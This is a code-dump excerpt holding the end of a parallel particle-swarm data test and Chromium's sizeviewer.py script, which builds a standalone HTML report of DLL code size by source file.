dset_counts = f.create_dataset('counts', (mesh.elementsGlobal,), dtype='i')
# get counts
el_index, counts = np.unique(origOwningEl.data[:,0],return_counts=True)
for element_gId, el_count in zip (el_index,counts):
dset_counts[element_gId] = el_count
if len(origCreatingProc.data_shadow) != 0:
raise RuntimeError("The shadow data should be empty at this stage, but isn't. Hmm...")
# get shadow particles!!
swarm.shadow_particles_fetch()
if len(origCreatingProc.data_shadow) == 0 and (uw.mpi.size>1):
raise RuntimeError("The shadow data should be populated at this stage, but isn't. Hmm...")
# now check that communicated particles contain required data.
# first create local numpy copies of primary data in memory,
# as h5py has limitations in the way you can index its arrays
dset_numpy_data = np.array(dset_data)
if not (dset_numpy_data[origCreatingProc.data_shadow[:,0], origParticleIndex.data_shadow[:,0]] == randomNumber.data_shadow[:,0]).all():
raise RuntimeError("Shadow particle data does not appear to be correct.")
# also check that we have the correct particle counts
# get counts
el_index, counts = np.unique(origOwningEl.data_shadow[:,0],return_counts=True)
# again create copy for indexing ease
dset_numpy_counts = np.array(dset_counts)
if not (dset_numpy_counts[el_index] == counts[:]).all():
raise RuntimeError("Shadow data particle counts do not appear to be correct.")
# close and clean up
f.close()
import os
if uw.mpi.rank==0:
os.remove('primarydata.hdf5')
|
tools/win/sizeviewer/sizeviewer.py | zealoussnow/chromium | 14,668 | 12636002 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
import base64
import codecs
import json
import os
import string
import subprocess
import sys
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
def Run(*args):
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, err = p.communicate()
if p.returncode != 0:
raise SystemExit(out)
def FindNode(node, component):
for child in node['children']:
if child['name'] == component:
return child
return None
def InsertIntoTree(tree, source_name, size):
components = source_name[3:].split('\\')
node = tree
for index, component in enumerate(components):
data = FindNode(node, component)
if not data:
      data = { 'name': component }
if index == len(components) - 1:
data['size'] = size
else:
data['children'] = []
node['children'].append(data)
node = data
def FlattenTree(tree):
result = [['Path', 'Parent', 'Size', 'Value']]
def Flatten(node, parent):
name = node['name']
if parent and parent != '/':
name = parent + '/' + name
if 'children' in node:
result.append([name, parent, -1, -1])
for c in node['children']:
Flatten(c, name)
else:
result.append([name, parent, node['size'], node['size']])
Flatten(tree, '')
return result
def GetAsset(filename):
with open(os.path.join(BASE_DIR, filename), 'rb') as f:
return f.read()
def AppendAsScriptBlock(f, value, var=None):
f.write('<script type="text/javascript">\n')
if var:
f.write('var ' + var + ' = ')
f.write(value)
if var:
f.write(';\n')
f.write('</script>\n')
def main():
jsons = []
if len(sys.argv) > 1:
dlls = sys.argv[1:]
else:
out_dir = os.path.join(BASE_DIR, '..', '..', '..', 'out', 'Release')
dlls = [os.path.normpath(os.path.join(out_dir, dll))
for dll in ('chrome.dll', 'chrome_child.dll')]
for dll_path in dlls:
if os.path.exists(dll_path):
print('Tallying %s...' % dll_path)
json_path = dll_path + '.json'
Run(os.path.join(BASE_DIR, '..', '..', '..', 'third_party', 'syzygy',
'binaries', 'exe', 'experimental', 'code_tally.exe'),
'--input-image=' + dll_path,
'--input-pdb=' + dll_path + '.pdb',
'--output-file=' + json_path)
jsons.append(json_path)
if not jsons:
print('Couldn\'t find dlls.')
print(
'Pass fully qualified dll name(s) if you want to use something other ')
print('than out\\Release\\chrome.dll and chrome_child.dll.')
return 1
# Munge the code_tally json format into an easier-to-view format.
for json_name in jsons:
with open(json_name, 'r') as jsonf:
all_data = json.load(jsonf)
html_path = os.path.splitext(json_name)[0] + '.html'
    print('Generating %s... (standalone)' % html_path)
by_source = {}
symbols_index = {}
symbols = []
for obj_name, obj_data in all_data['objects'].iteritems():
for symbol, symbol_data in obj_data.iteritems():
size = int(symbol_data['size'])
# Sometimes there's symbols with no source file, we just ignore those.
if 'contribs' in symbol_data:
i = 0
while i < len(symbol_data['contribs']):
src_index = symbol_data['contribs'][i]
i += 1
per_line = symbol_data['contribs'][i]
i += 1
source = all_data['sources'][int(src_index)]
if source not in by_source:
by_source[source] = {'lines': {}, 'total_size': 0}
size = 0
# per_line is [line, size, line, size, line, size, ...]
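          # e.g. per_line == [12, 4, 13, 8] would mean line 12 contributes 4
          # bytes and line 13 contributes 8 (illustrative values only).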
for j in range(0, len(per_line), 2):
line_number = per_line[j]
size += per_line[j + 1]
# Save some time/space in JS by using an array here. 0 == size,
# 1 == symbol list.
by_source[source]['lines'].setdefault(line_number, [0, []])
by_source[source]['lines'][line_number][0] += per_line[j + 1]
if symbol in symbols_index:
symindex = symbols_index[symbol]
else:
symbols.append(symbol)
symbols_index[symbol] = symindex = len(symbols) - 1
by_source[source]['lines'][line_number][1].append(
symindex)
by_source[source]['total_size'] += size
binary_name = all_data['executable']['name']
data = {}
data['name'] = '/'
data['children'] = []
file_contents = {}
line_data = {}
for source, file_data in by_source.iteritems():
InsertIntoTree(data, source, file_data['total_size'])
store_as = source[3:].replace('\\', '/')
try:
with codecs.open(source, 'rb', encoding='latin1') as f:
file_contents[store_as] = f.read()
except IOError:
file_contents[store_as] = '// Unable to load source.'
line_data[store_as] = file_data['lines']
# code_tally attempts to assign fractional bytes when code is shared
# across multiple symbols. Round off here for display after summing above.
for per_line in line_data[store_as].values():
per_line[0] = round(per_line[0])
flattened = FlattenTree(data)
maxval = 0
for i in flattened[1:]:
maxval = max(i[2], maxval)
flattened_str = json.dumps(flattened)
to_write = GetAsset('template.html')
# Save all data and what would normally be external resources into the
# one html so that it's a standalone report.
with open(html_path, 'w') as f:
f.write(to_write)
# These aren't subbed in as a silly workaround for 32-bit python.
# The end result is only ~100M, but while substituting these into a
# template, it otherwise raises a MemoryError, I guess due to
# fragmentation. So instead, we just append them as variables to the file
# and then refer to the variables in the main script.
filedata_str = json.dumps(file_contents).replace(
'</script>', '</scr"+"ipt>')
AppendAsScriptBlock(f, filedata_str, var='g_file_contents')
AppendAsScriptBlock(f, json.dumps(line_data), var='g_line_data')
AppendAsScriptBlock(f, json.dumps(symbols), var='g_symbol_list')
favicon_str = json.dumps(base64.b64encode(GetAsset('favicon.png')))
AppendAsScriptBlock(f, favicon_str, var='g_favicon')
AppendAsScriptBlock(f, flattened_str, var='g_raw_data')
AppendAsScriptBlock(f, str(maxval), var='g_maxval')
dllname_str = binary_name + ' ' + all_data['executable']['version']
AppendAsScriptBlock(f, json.dumps(dllname_str), var='g_dllname')
AppendAsScriptBlock(f, GetAsset('codemirror.js'))
AppendAsScriptBlock(f, GetAsset('clike.js'))
AppendAsScriptBlock(f, GetAsset('main.js'))
f.write('</html>')
return 0
if __name__ == '__main__':
sys.exit(main())
|